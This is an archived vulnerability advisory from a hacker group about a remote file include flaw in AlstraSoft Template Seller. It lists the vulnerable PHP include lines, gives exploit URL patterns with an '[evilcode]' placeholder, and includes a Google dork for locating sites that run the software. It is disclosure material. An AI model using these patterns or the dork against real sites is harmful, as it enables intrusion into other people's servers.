AOH :: HP Unsorted A :: B06-4568.HTM

AlstraSoft Template Seller Remote File Include Vulnerability



SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability
SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability



#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability
#
# Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################
#
#
#       Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq@hotmail.com
#
# Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################
#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
###############################################################################
# Vulnerable found in

payment_result.php and spuser_result.php

line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");


# Exploit

/payment/payment_result.php?config[template_path]=[evilcode]

/payment/spuser_result.php?config[template_path]=[evilcode]


# google dork

"Powered by AlstraSoft Template Seller"

######################################E.O.F##################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.